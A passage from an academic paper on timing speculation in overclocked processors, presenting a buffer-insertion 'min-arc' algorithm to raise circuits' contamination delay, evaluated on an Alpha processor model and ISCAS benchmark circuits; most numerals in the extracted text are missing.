viz., to ensure that the delay of each path is less than a fixed upper bound. the closest work we are aware of is presented in chen & muroga ( ), which uses timing optimization algorithm, sylon-dream level-reduction (sdlr), to speed up multi-level networks. the non-critical paths are processed by an area reduction procedure to reduce network area without increasing the maximum depth. sdlr uses the concept of permissible functions in both level and area reduction processes. contribution the existing techniques only attempt to confine the critical path delay under design specified threshold. for ts architectures, the delay optimization algorithms must also make sure that the short paths satisfy imposed threshold requirements to increase the extent of performance enhancement. this is, in addition to the existing short path timing constrains free of any hold time violations. this aspect of our work makes it different from any of the existing works. as far as we know, this is the first work aimed at increasing the contamination delay of digital circuits up to a given threshold, beyond satisfying hold time violations. in this paper, we make three significant contributions. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. first, we present a detailed timing analysis of a dual latch ts framework and quantify the margin for performance enhancement while operating beyond worst case. second, we study the impact of short paths on performance of alpha processor core, where we present a sensitivity analysis of the achievable performance gain for different settings of contamination delay. in that process, we establish a case for increasing contamination delay of circuits in aggressive systems to improve the extent of performance enhancement. third, we present an algorithm to add delay buffers for dual latch ts framework. specifically, we develop a weighted graph model to represent a multi-level digital circuit. we showcase a new min-arc algorithm that operates on the graph network to increase short path delays by adding buffers to selective interconnections. we consider each interconnection, whether it lies on the critical path, short path, or not. depending upon how far each section of the circuit is from the maximum and minimum delayed paths, fixed delay buffers are added. the presented algorithm is evaluated using iscas’ benchmark suite. in our simulations, we investigate the increase in short path delays with and without relaxing critical path delays of these circuits. also, we analyze the area and power overhead due to the addition of delay buffers at extreme corners. using our new algorithm, we were able to increase the contamination delay to % of the circuit critical path length and also without affecting its propagation delay. we were further able to increase the contamination delay by relaxing the propagation delay constraint for a larger gain in performance. the remainder of this paper is organized as follows. ‘timing speculation framework’ provides an overview of dual-latch ts framework. ‘performance impact of short paths’ investigates the timing constraints of ts framework and ‘increasing short path delays’ presents the challenges of increasing short path delays. in ‘performance & contamination delay: a study on alpha processor’, we present our case study on alpha processor. following this, we present the network model and the algorithm for manipulating short paths of the circuit in ‘min-arc algorithm for increasing short path delays.’ results of our experiments are presented in ‘evaluation of min-arc method.’ we present a brief literature review in ‘related literature’ and summarize our concluding remarks and future directions in ‘conclusions.’ timing speculation framework in a pipelined architecture, a timing error occurs if changes in the input propagate through the combinational logic before the computed results for the previous input are latched. the timing errors also occur due to the mismatch between the circuit propagation delay and the clock cycle time. therefore, in a pipelined processor, the clock frequency is determined based on the circuit critical path across all stages under the most adverse operating conditions. traditional design methodologies for the worst-case operating conditions are too conservative, as the critical timing delays rarely occur in tandem during typical circuit operation. such infrequent occurrence of critical timing delays opens up a new domain of study that allows improvement of processor performance to a greater extent. during avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (a) typical pipeline stage in a reliably overclocked processor (b) illustration of aggressive main and ps clocks for circuits with different contamination delays. execution, delay incurred by the digital circuit is much less than the worst-case delay. this can be exploited by making common cases faster. timing speculation is a technique wherein data generated at aggressive speeds are latched and sent forward speculatively assuming error free operation. error detection is deployed to detect a timing violation. when an error is detected, the forwarded data is voided and the computation is performed again as part of the recovery action. a framework to achieve this is described below. dual latched system we first present a brief description of a dual latched timing speculation framework from bezdek ( ). we refer to this framework as local fault detection and recovery (lfdr). figure a presents the lfdr circuit in between two pipeline stages. to reliably overclock a system dynamically using lfdr framework, we need two clocks: mainclk and psclk . the two clocks relationship is governed by timing requirements that are to be met at all times. lfdr consists of two registers: a main register clocked ambitiously by mainclk , which is running at a frequency higher than that is required for error-free operation; and a backup register clocked by psclk , which has same frequency as mainclk but is phase shifted. this amount of phase shift is such that backup register always sample the data by meeting the worst-case propagation delay time of the combinational circuit. the timing diagram shown in fig. b illustrate the phase relationship between these clocks. here, case (i) presents the worst case clock, wcclk , with time period , which covers the maximum propagation delay. case (ii) shows ts scenario, where the clock time period is reduced to . however, psclk is delayed by in such a way that the next rising edge of psclk coincide with next rising edge of wcclk . thus a computation started at the rising edge of mainclk will successfully complete by the next rising edge of psclk . the key point to note here is that the amount of phase shift, , for the psclk is limited by the contamination delay, tcd, of the circuit. figure shows timing waveforms that depict timing speculation using lfdr. in the figure, inst moves forward without any timing errors using speculation. however, inst encounters a timing error in stage i, indicated by corrupted data ‘‘terr.’’ this error is detected by the error detection mechanism, and the stage error signal is asserted. this stage error signal triggers a local and global recovery. timing error recovery flushes the data avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure timing diagram showing pipeline stage level timing speculation. sent forward speculatively, indicated in the figure as ‘‘xxx,’’ and voids the computation performed by stage i+ . once the timing error is fixed, the pipeline execution continues normally. it is clear from the waveform that the time gained by ts is , which is equal to . a balance must be maintained between the number of cycles lost to error recovery and the gains of overclocking. one important factor that needs to be addressed while phase shifting the psclk is to limit the amount of phase shift within the fastest delay path of the circuit. performance impact of short paths the cardinal factor that limits data-dependent allowable frequency scaling for lfdr frameworks is the contamination delay of the circuit. the phase shift of the delayed clock is restricted by the contamination delay to prevent incorrect result from being latched in the backup register. reliable execution can be guaranteed only if the contents of the redundant register are considered ‘‘golden.’’ to overcome this limitation, it is important to increase the contamination delay of the circuit. case (iii) in fig. b presents a ts scenario where the clock time period is reduce and psclk is delayed by . as phase shift is greater than , the range of achievable overclocking is higher in case (iii) than case (ii). from this example, we can conclude that having contamination delay t ′cd > tcd increases the range of aggressive clocking under ts. let us denote the worst-case propagation delay and minimum contamination delay of the circuit as tpd and tcd, respectively. let twcclk , tmainclk and tpsclk represent the clock periods of wcclk , mainclk and psclk , respectively. let tps represent the amount of phase-shift between mainclk and psclk . also we will denote tov as the overclocked time period. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. at all times, the following equations hold. twcclk =tpd= fmin ( ) tmainclk =tpsclk =tov ( ) tpd=tov +tps. ( ) let fmin be the setting when there is no overclocking i.e., tov = tpd. in this case, tps = . the maximum possible frequency, fmax permitted by reliable overclocking is governed by tcd. this is because short paths in the circuit, whose delay determine tcd, can corrupt the data latched in the backup register. if the phase shift tps is greater than tcd, then the data launched can corrupt the backup register at psclk edge. if such a corruption happens, then the backup register may latch incorrect result and cannot be considered ‘‘golden.’’ hence, it is not possible to overclock further than fmax . the following equations should hold at all times to guarantee reliable overclocking. tps≤tcd ( ) fmax ≤ tpd−tcd · ( ) for any intermediate overclocked frequency, fint , between fmin and fmax , tps ≤tcd. during operation, fint is determined dynamically based on the number of timing errors being observed during a specific duration of time. the dependence of phase shift on contamination delay leads directly to the limitation of the aggressive frequency scaling. a simplistic notion of the maximum speed-up that is achievable through reliable overclocking is given by eq. ( ). maximum speedup= tpd tpd−tcd · ( ) increasing short path delays it is clear from eq. ( ) that the maximum speedup is achieved when the difference between the contamination delay and propagation delay is minimal. however, it must be noted that increasing tcd also affects the margin for overclocking. to overcome this challenge, we develop a technique for increasing the contamination delay to a moderate extent without affecting the propagation delay of the circuit. as outputs of the combinational logic depends on several inputs, and more than one path to each output exists, with both shorter and longer paths overlapping, adding buffer delays to shorter paths may increase the overall propagation delay of the circuit. the main challenge is to carefully study the delay patterns, and distribute the delay buffers across the interconnections. more importantly, the overall propagation delay must remain unchanged. however, it may not be possible to constrain propagation delay of the critical paths due to logic/interconnection sharing in the network. most practical circuits have significantly lower contamination delay. for instance, we verified that an -bit cla adder circuit, implemented in . µm cadence generic avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. standard cell library (gsclib), has a propagation delay of . ns, but an insignificant contamination delay of . ns, thus allowing almost no performance improvement through reliable overclocking. it should be noted that the outputs of cla adder depends on more than one inputs, thus a trivial addition of delay buffers to short paths results in increased propagation delay of the circuit. however, by re-distributing the delay buffers all to one side (either input or output), it is possible to increase contamination delay, without affecting the propagation delay, by up to . ns. increasing circuit path delay above a desired level without affecting critical path is not uncommon in sequential circuit synthesis. in fact, it is performed as a mandatory step during synthesis operation. in a sequential circuit, for an input signal to be latched correctly by an active clock edge, it must become stable before a specified time. this duration before the clock edge is called the set up time of the latch. the input signal must remain stable for a specified time interval after the active clock edge in order to get sampled correctly. this interval is called the hold time of the latch. any signal change in the input before the next set-up time or after the current hold time does not affect the output until the next active clock edge. clock skew, which is the difference in arrival times at the source and destination flip-flops, also exacerbates hold time requirements in sequential circuits. hold time violations occur when the previous data is not held long enough. hence, adding buffers to short paths that violate hold time criteria is a step that is carried out without too much of a concern regarding area and power overheads. increasing the contamination delay of a logic circuit significantly without affecting its propagation delay is not straightforward (shenoy, brayton & sangiovanni-vincentelli, ). at first glance, it might appear that adding delay by inserting buffers to the shortest paths will solve the problem. however, delay of a circuit is strongly input dependent, and several inputs play a role in deciding the value of an output in a particular cycle. current synthesis tools support increasing the delay of short paths through their hold violation fixing option; in a broader sense, what we essentially want to do is to extend the hold time of the backup register. though it is possible to phase shift to a maximal extent, reducing the clock period by that amount may result in higher number of errors. having a control over the increase in contamination delay gives us an advantage to tune the circuit’s frequency to the optimal value depending on the application and the frequency of occurrence of certain input combinations. also, introducing delay to increase contamination delay increases the area of the circuit. therefore, while judiciously increasing contamination delay we must also ensure that the increase in area is not exorbitant. performance & contamination delay: a study on alpha processor to demonstrate the effect of increasing short paths on performance, we conducted a simple study on alpha processor model for different contamination delay settings. we ran selected set of spec benchmark workloads on simplescalar—a cycle accurate simulator (burger & austin, ). in order to embed timing aspects in simplescalar, we examined avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table simulator parameters. parameter value fetch/decode/issue/commit width inst/cycle functional units int alus, int mul/div, fp alus, fp mul/div l d-cache k l i-cache k l unified k technology node nm base frequency . ghz no. of freq levels freq sampling µs freq penalty µs (assuming dual pll) a hardware model of alpha processor datapath and obtained the number of timing errors occurring at different clock period, for each workload. for this purpose we synthesized illinois verilog model (ivm) for alpha configuration using nm osu standard cell library (stine et al., ). although we are aware of the fact that the pipeline in ivm is simplistic, it does not have any impact on our results as we are performing a comparative study of different settings for the same circuit. in this experiment, we are exploring the impact of contamination delay on timing speculation framework at circuit level. therefore, we believe our analysis and insights are applicable to other architectures as well. we adopt the configuration close to hardware model for simplescalar simulations as well. the details of the settings are presented in table and more details about our hardware model can be found in ramesh, subramanian & somani ( ). it is important to note that, for our hardware model, the timing critical path is in the issue stage of the processor pipeline. therefore, applications which are core bound will be effected more than the applications that are memory bound. in this study, we have presented the benchmarks which has higher error rate than the rest of the suite for all equal intervals of the operating frequency. therefore, performance results from this study present the lower bounds of speed-up that can be observed for spec benchmarks. performance results for other benchmarks are bound to be higher than speed-up observed in our study. experimental results figure a shows the cumulative error rate of selected spec workloads for equal intervals, for worst-case delay of ns and minimum contamination delay of . ns. the error profile obtained is the average values obtained by running the experiment for , cycles, and repeating the experiment with different sequences of , instructions for each workload. benchmarks gap and bzip are core bound and therefore have a dominating timing error rate. benchmark equake is memory bound and its timing error rate is less than the core bound applications for the entire operating frequency range. a random timing error injector induces appropriate number of errors in simplescalar. pipeline stall of one cycle per error occurrence is added correspondingly. as increasing the contamination delay affects path distribution of the whole circuit, it is likely that the overall avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (a) cumulative error rate at different clock periods for the ivm alpha processor executing instructions from spec benchmarks (b) average error rate per clock cycle (c) normalized speed-up relative to reliably overclocked original unmodified circuit. error rate for each workload may go up. in our experiment, we assume uniform increase in error rate, denoted as dev, for each workload. for our study, we used dev = , , and %. further, we analyze the performance impact of varying cds with different target error rates (tgt). figure b shows the error occurrence per cycle for bzip , equake and gap. quite evidently, we observed smaller error occurrences for small/no deviation of circuit, and the error rate tend to increase as the error rate due deviation, dev, goes up. however, a small increase in target error rate allows more margins for performance increase. but, this may not hold true for higher error rates. in general, it was generally observed that when dev gets closer to tgt, there was an increase in error occurrences. this is more noticeable in the case of gap. since it may not always be possible to increase the contamination delay without affecting the critical paths, we increase the cd to a threshold limit. as a result, we may end up increasing the pd. we also experimented with the possibility of increasing pd by allowing a leeway of a small percentage. we study the speed-up obtained for different combinations of cd threshold and pd leeway relative to the performance of aggressive clocking framework with the original circuit. l〈l〉−t〈t〉 denotes l% leeway of pd and t% minimum threshold of cd. we performed our study for l = , , and % and t = , , and %. we found that in all the cases, performance goes up with threshold values, which is in agreement with our intuition. in other words, increasing the short path delays provides more allowance for reliable aggressive clocking assuming a moderate target error rate occurrence. it should also be noted that allowing a leeway on critical paths induces performance overhead. normalized speed-up trend of bzip workload for various modes of operation is exemplified in fig. c. we have illustrated the results for the modes that yielded performance gains. the performance of bzip benchmark for all the configurations we implemented is shown in fig. . from the point of view of leeway on pd, our investigation on relative performance is summarized as follows: • l= is the best case scenario for performance benefits, yielding from – % speed-up. • ≤l≤ is the effective range for any performance benefit, irrespective of t . • l= % gives a small increase in performance in the range %≤dev ≤ %. • l= % gives a little increase in performance for few cases in the range %≤dev ≤ %. • l > % causes performance overhead even for higher values of t and smaller dev. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. �� ���� �� ���� � ��� �� ��� � �� �� � �� �� � �� ��� � �� � ��� � �� � �� � �� � �� � �� � ��� � � � ��� � � � �� � � � �� � � � ��� � � � ��� � � � �� � � � �� � � � ��� � � � �� � �� � � � � � � � � ����� ��������� �������� ��� ����� ��� ���� figure normalized speed-up of bzip benchmark for different l and t configurations. similar trends were observed for equake and gap as well. our experiments reveal that by increasing the delays of short paths up to %, subject to moderate increase in pd (typically %), yields up to % performance enhancement. also, it is very important to keep the increase in error rate due to circuit deviation within %. this guarantees zero overhead even at maximum leeway (l= %). this study establishes a case for change in the existing synthesis algorithms to incorporate minimum path delay constraints. the major change in this revised algorithm is to increase the short path delays without (or minimally) affecting the critical path delays of the circuit. a secondary and passive constraint is to maintain the circuit variation (if not make it better), so that the deviation causing increase in error occurrences is kept minimal. we will discuss more on this constraint later. we provide a systematic approach to realize circuits with path delay distribution that allows greater margin for aggressive clocking for performance enhancement. min-arc algorithm for increasing short path delays it is easy to understand that increasing short path delays invariably increases the area of the circuit and, if not done carefully, affects its propagation delay. an ideal solution is to have logic moved from the critical path to the non-critical paths without using the specified components at the output terminals. this is not always possible. the next best approach would be to increase the delay of short paths as much as possible without increasing the propagation delay, and keep the area increase within a limit. as mentioned earlier, short path delays can be increased without affecting propagation delay for carry look-ahead adders and other smaller circuits. however, this is done manually, and the area overhead is very high for -bit adders. minimizing short path constraints, without increasing propagation delay may not be possible for many practical circuits. in that case, we can allow a small increase in the propagation delay, if that increase can allow higher margin for ts. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we introduce min-arc algorithm for increasing contamination delay of logic circuits up to a defined threshold. we adopt an approach closely resembling the min-cut algorithm for flow networks. the basic idea of the algorithm is to identify a set of edges, referred to as the cut-set, such that adding a fixed amount of delay to the set does not affect the delays of any long paths. however, an important difference between this and traditional flow networks is that the cut-set for the min-arc may not necessarily break the flow of the network. but rather, the cut-set is a subset of edges in the actual (rather traditional) min-cut. the reason why we do not consider a traditional min-cut is to not unnecessarily add delay buffers where it is not needed. however, a subset of the min-cut edges is essential to keep the addition of delays minimal. another reason for increasing the path delay in batches is to keep the structure of the logic network close to unaltered from the original network. benefits of maintaining path delay distribution is explained further in ‘evaluation of min-arc method.’ the basic outline of the min-arc algorithm to increase the short path delay of the circuit is presented in algorithm . the entire procedure is divided into six basic steps, in which the first and last steps are one-time operations, converting the logic circuit to an equivalent graph network and vice-versa. the remaining parts of the algorithm modify the graph into a weighted graph network and iteratively update the prepared network by adding the necessary delay to the selected interconnection using the modified min-cut procedure. we explain these steps in detail below. construction of weighted graph network the first step is to convert the given combinational logic into a directed graph, where the logic blocks are nodes and the interconnections from each logic block to others form directed edges. the nodes and edges may be weighted depending on their time delays. to this graph we add a source, s, and edges that connects s to all the inputs. we also add a drain node, d, to which all the outputs connect. the weights for s, d and all the edges from/to them are set to zero. figure illustrates an example network model for a -bit ripple carry adder with s and d added. tpd and tcd of the logic circuit are highlighted in the figure. it is necessary to preserve the node types whether they are logic gates, buffer delays, input or output pins. also it is important to note the type of logic for a logic gate node. this is important in order to maintain functional correctness of the circuit. algorithm . steps for manipulating short path delay in logic circuits step a: convert combinational circuit to a graph step b: get minimum and maximum path through every edge step c: prepare graph for min-cut step d: do min-cut on the graph obtained in step c step e: add delay to the edges returned by min-cut step f: update the graph and repeat steps b through f until contamination delay is increased up to the required value step g: convert the graph back to combinational logic circuit avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure illustration: network model for -bit ripple carry adder, assuming unit interconnect and logic delays. finding the minimum and maximum path once the directed network is constructed, the next step is to mark the edge weights for generating the cut-set. we use several terms and symbols as described in table . we calculate the longest and shortest distances from source to one end node of an edge and from the other end of the edge to drain. that is, we obtain max(s,i), max(j,d) min(s,i) and min(j,d) for every edge e(i,j) in the weighted graph. we use djikstra’s algorithm to calculate max() and min() functions. from this, we calculate emax(i,j) and emin(i,j) for every edge, e(i,j) as described in table , which corresponds to the longest and shortest paths of the logic network through that edge. the paths marking emin(i,j) and emax(i,j) for randomly chosen nodes i and j for the -bit ripple carry example is depicted in fig. . in a similar manner, the minimum and maximum weights for every edge are calculated. preparing graph for min-cut we construct a weighted graph network to select a minimum weight interconnection to add the delay buffer. once we add a delay buffer, we recalculate new edge weights. the edge weights are calculated in such a manner that the minimum weighted arc gives the most favorable interconnection where to add delay. the procedure for calculating new weights for every edge, e(i,j), is described in algorithm . the edge, e(i,j) may fall under one of the four categories listed in the algorithm. for the first two cases, the edge weight is calculated as the sum of emin(i,j) and emax(i,j). this is the general scenario where the minimum and maximum paths are added as edge weights. the first case is the scenario of a short path, where emax(i,j) is smaller than the threshold for contamination delay. the latter case is when the selected edge, e(i,j), has a delay such that the shortest path is closer to the threshold than the longest path is to the propagation delay. in other words, when a delay buffer is added to any edge in the path to increase the short path delay by the given threshold, the maximum delay increase affecting a critical path is still within propagation delay of the circuit. the third scenario is when the longest path exceeds propagation delay including leeway. this edge is critical and by no means any buffer can be added to this. hence, we assume a large number (inf) as the edge weight so that this edge is never picked as part of the min-cut. finally, we have a case when delay buffer addition exceeds or gets avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table definitions. terms definitions max(i,j) maximum delay path from node i to j, incl. i and j min(i,j) minimum delay path from node i to j, incl. i and j max(s,d) propagation delay of the circuit, tpd min(s,d) contamination delay of the circuit, tcd e(i,j) edge from node i to j wt(i,j) weight of edge from node i to j, not incl i and j emax(i,j) max(s,i)+wt(i,j)+max(j,d) emin(i,j) min(s,i)+wt(i,j)+min(j,d) lwy percentage of leeway [ - ] on critical path while adding buffer. e.g., lwy =x% allows the target network to have tpd( +x/ ) as the final propagation delay thd normalized threshold (from tcd to tpd) below which we do not want any short paths inf a very large integer value scale a moderate integer value, (>tpd), to scale the weight to a new range. func() a function dependent on tpd, tcd, emax(i,j) and emin(i,j). returns a real number, - . in this work, we define this as√ (emax (i,j)−thd) (tpd−thd) × √ (emin(i,j)−tcd) (thd−tcd) very close to the propagation delay. in this case, we scale the edge weight moderately higher than the original range. this addresses the case where addition of buffer to this edge affects longer paths. finding the min-cut once the edge weights are re-assigned, the cut-set is determined. we use a variant of edmonds−karp min-cut algorithm for graph network (edmonds & karp, ). the cut-set consists of edges with minimum weight in the graph with assigned weights. figure illustrates the different scenarios in determining the cut-set. the cut-set re-definition is necessary because the traditional min-cut always has at least one edge in the critical path. figure a shows how a logic circuit is divided into critical and non-critical paths. as long as the non-critcical paths are independent of critical paths, buffer delays can be added to the former ones. in this case, the min-cut excludes all the critical paths. generally, the scenario is not this straightforward. as illustrated in fig. b, the short paths are intertwined with longer paths that are not critical paths. in such cases, the weights of the longer paths are scaled to a different range (in this case k). if there is a subset of short paths that exist independent of the longer paths, buffer delays are added to this subset. we noticed that this is the most common scenario in the benchmark circuits. once all the independent short paths have been added with corresponding delays, the new circuit is left out with paths that are scaled as shown in fig. c. buffer delay is added to the scaled paths, which runs the risk of modifying longer paths into critical paths. the final circuit is shown in fig. d, where there are only critical paths and paths that have delay meeting the threshold requirements. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure illustration of four different scenarios finding the cut-set in min-arc algorithm. in the ripple carry example, the case is similar to fig. a. the cut-set is thus all the paths excluding the critical path. figure also shows the min-cut where the buffers are added. algorithm . re-calculation of edge weight for edge emax(i,j) : if emax(i,j) ≤ thd then : wt(i,j)=emin(i,j)+emax(i,j) : else : if (thd−emin(i,j) < (tpd−emax(i,j)) then : wt(i,j)=emin(i,j)+emax(i,j) : end if : else : if emax(i,j) > (tpd( +lwy )) then : wt(i,j)= inf : end if : else : wt(i,j)=scale∗func() : end if avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. adding buffer delays the buffers are carefully placed on edges where they would not affect the longest paths. thus, the amount of delay each buffer adds depend on the path connectivity, which may have major impact on the timing error occurrence. for example, it is possible to add delays such that all the paths have delay equal to the critical path delay. in most practical circuits, increasing all path delays to a certain delay interval can result in a rise in the timing errors, causing overhead due to error recovery. thus, it is always necessary to keep this under control when designing the algorithm so that there is a gentle rise in path delays from one interval to the other. buffers are added on the edges present in the cut-set. the amount of delay added, delay(i,j), for any edge e(i,j) is given by eq. ( ). delay(i,j)=min((thd−emin(i,j)),(tpd−emax(i,j))). ( ) the delays for all the edges in a cut-set, for a given iteration, are added at the same time. while adding delay, we ensure that in one iteration there are no other edges to which the de- lay is added that are connected to paths through this edge. please note that there is a relation between max-flow and min-cut problems and the proposed formulation is in fact max-flow. satisfying conditions we iterate steps b through f until the minimum condition for the shortest path is met or until there is no other edge where delay can be added without affecting tpd of the circuit (including lwy ). step f checks if the desired value of contamination delay is reached. once the required conditions are met, no more buffers can be added and the algorithm moves on to step g. from our experiments, we found that the minimum condition for contamination delay is achieved for all the circuits we evaluated. converting graph to logic circuit the final step is to revert back to the original circuit once the short paths lengths are increased to the desired level. since we record the node types in the network graphs in step a, it is possible to re-build the circuit from the graph network with the added buffers. it should be noted that we do not modify the logic of the circuit, as we only add additional buffers preserving the original logic of the circuit. complexity of min-arc algorithm the time complexity of min-arc algorithm is mainly affected by steps b and d. let |v | be the total number of logic blocks (vertices) and |e| is the total number of interconnections (edges) in the logic circuit. using djikstra’s shortest path algorithm, the worst case time to calculate max() and min() functions is o(|v | ). for finding the minimum weighted edge min-cut for the graph network, it takes o(|v‖e| ). in the worst case every edge becomes a part of the cut-set. that is, there are at most |e| iterations. hence, the overall time complexity of the min-arc algorithm is o(|v | |e|+|v‖e| ), which is dominated by the second term as |v |< |e|. impact of process variation process variation can alter gate delays and hence can alter the distribution of path delays. therefore, we need to take conservative estimates of circuit delays into account while avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table brief description of iscas benchmarks with netlist details. circuit description inputs outputs gates nets area (µm ) c -channel interrupt controller , c -bit sec circuit , c -bit alu , c -bit sec circuit , , c -bit sec/ded circuit , , c -bit alu and controller , , , c -bit alu , , , c -bit alu , , , c -bit adder/comparator , , , using our algorithm. inter-die variations impact all the paths and therefore impact on our algorithm is minimal. to mitigate intra-die variation, conservative padding of buffers needs to be done on the short paths to make sure that extreme variation is tolerated at the expense of area overhead. if such additional area overheads are to be ignored, process variation will only reduce the range of aggressive clocking slightly; and cannot eliminate the possibility of reliable overclocking and the scope for performance improvement by ts. given that the scope of this paper is to demonstrate the concept and develop an algorithm to realize it, we do not evaluate the actual impact any further. evaluation of min-arc method although the time complexity of min-arc algorithm is polynomial order, it is necessary to consider its performance on practical circuits. we evaluate the algorithm on iscas’ benchmark suite (hansen, yalcin & hayes, ). the suite provides a diverse class of circuits in terms of number of ios, logic gates and interconnections (nets). table lists a brief description and other relevant details of the circuits. all the circuits were transformed into network graphs as described in ‘min-arc algorithm for increasing short path delays’. the interconnect delays and logic cell delays were obtained by synthesizing the circuits for nm technology using osu standard cell library (stine et al., ). all circuits are synthesized for minimum area (max area is set to zero) using synopsys design compiler, which acts as a starting point for our algorithm. all the configurations (l〈l〉−t〈t〉) described in ‘performance & contamination delay: a study on alpha processor’ were investigated. results analysis positive results were noted in this study. first, for all the circuits, the min-arc method was able to increase the short path delays to the desired threshold levels without any leeway on pd. we continued our evaluation with all the configurations to include leeway in order to study the effect of increasing pd. we include the results only for a few selected circuits and average of all circuits. it was found that circuit characteristics (i.e., size and connectivity) have strong effects on how the algorithm performs. figure illustrates the increase in the short path delays and critical path delays for different configuration in c and c avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure charts showing increase in contamination (short path) delay and propagation (critical path) delay of circuits. circuits. the chart also shows the average increase of short and critical path delays for all nine circuits. for smaller circuits (as in c ), we notice that there is not much the algorithm possibly could do, as there is a higher chance of affecting the critical path by adding delay to any net. in c , we notice that the maximum delay increase of short paths from the base circuit with ps, (with % leeway) is around ps. however, in larger circuits (as in c ), delay buffers were more easily added. this is seen in c , where short path delay is increased from ps to ps, again with % leeway. in other words, as the circuit size increases, the number of independent short paths also become higher in number, allowing easy inclusion of delay buffers. it should also be noted that there is not much impact on increasing leeway from l to l or even higher levels pd. on the other hand, increasing leeway tend to have a great impact in increasing the cd. on an average, there is a . × factor of increase in short path delay for each % increase in leeway. assuming lwy = , we were able to achieve %– % increase in cd, and increasing lwy steadily from to %, we observed increase of cd in a saw tooth pattern achieving %– , % increase in cd. it should be observed from the critical path delay patterns that the algorithm strictly adheres to the limit imposed on critical path delay. one major side effect of adding buffers to circuits is that it affects path delay distribution. although our goal is to increase the cd to a threshold limit, pushing a set of paths to one side may increase the timing error rate during execution. therefore, it is important to analyze the delay distribution of the circuit paths. even though the structure of the circuit is maintained, as the short paths are now pushed to offer higher delay, it increases the possibility of error occurrences in ts framework. for our case study in ‘performance & contamination delay: a study on alpha processor,’ we modelled this increase in timing error rates as dev. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure path delay distribution from cd to pd for c and c . figure illustrates the path delay distributions for selected configurations of two circuits (c and c ). we have divided the range between cd and pd into ten bins. x-axis in fig. represent the bin number. for c , t l and t l configuration reduce the number of paths having higher delay. this implies a reduction in timing error rate in ts framework. higher leeway configuration t l increases cd but path delay distribution matches the base line, implying no increase in timing error rate. for c , even no leeway configuraion (t l ) performs better than baseline. also, higher leeway configurations, t l and t l , perform much better than baseline in terms of paths having higher delay. overall, for c (and other smaller circuits), the path structure is mostly maintained and in the case of c (and otherlarger circuits), the circuit structure was altered moderately. increase in number of paths having higher delay implies increase in timing error rate of ts framework. from these results, we conclude that for smaller circuits, our algorithm maintains or does not increase timing error rate of ts framework. for larger circuits, our algorithm reduces the timing error rate for higher leeway configurations. as timing error rate also influence the possible performance gain, reduction in timing error rate is favorable for ts framework. to illustrate this point further, we present mean and standard deviation of all the circuits. figure presents plots of selected circuits and average of all the circuits. we note that the smaller circuits (c ) suffer from negligible deviation from original circuit in spite of higher mean, and the larger circuits ((c )) are vulnerable to change in structure. from the average plot, it is also evident that higher leeway values cause more deviation. a maximum deviation of − % and + % were observed for t l and t l configurations, respectively. area overhead a major overhead for min-arc algorithm is the area penalty. more the circuit allows adding buffers, more the overhead in chip real estate. we estimate the original circuit area in terms of buffer delays, and compare the area increase for each of the configurations. this study facilitates to narrow down the choices of l and t for any given circuit. table enlists the percentage area increase for various l and t combinations, for all the circuits. it is important to choose the configuration that has highest increase in delay with moderate increase in area. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure average path delay distribution, in terms of mean and deviation. mean values are represented by line while standard deviation values are represented by bars. without any leeway (corresponding to l ), with every % increase in t there is around % increase in area. this holds for most circuits, except for smaller circuits as in c and c , where it is around %. a maximum of % increase is observed for c at t = %. for this maximum threshold, there is a wide range of area increase across the benchmark circuits. we did not observe any strong relation between circuit size and the area increase. this means that it is the circuit connectivity that has a major role to play on buffer placements. for t = %, the minimum area increase of around % is observed for the circuit c . a general observation from our study is that the area increases with l or t . however, we did observe quite a few configurations, where the area decreases with l or t . this reflects how the algorithm handles different input combinations independently, rather than building from previous level output. we noticed several places where area would decrease with l (shaded dark black in table ). observation related to these shaded entries is that they beat the increasing area trend with increasing leeway. as illustrated, there is at least one place where this occurs in each circuit, with the exception of c and . in the case of t , we notice that there are only a couple of configurations where this occurs, namely in c (underlined in table ). this explains how target threshold for short paths affect increase in area. in most cases, we noticed around % increase in area for every % in l. in majority of the cases, we noted only moderate increase in area (< %). we observed cases where the area increase was more than %, in which of them are from the same circuit, c . this is a -bit alu with controller (c ) that has a lot of parallel paths with few common edges. similar but less intense effect is seen in the case of the -bit alu (c ). the configurations where the area increase exceeds % is highlighted light black in the table. power overhead the addition of buffers to the circuit for increasing contamination delay also increases the power consumption. table presents the percentage power increase for various l and t combinations. using the spice models, we have estimated the power consumed by the buffers added and estimated the percentage increase in worst case power consumption. we have used golden configuration (l t ) as the base for all configurations of l and t . avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table percentage area increase after addition of buffers relative to base configuration t l . ckt l l l l l l l c t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . t . . . . . . . c t . . . . 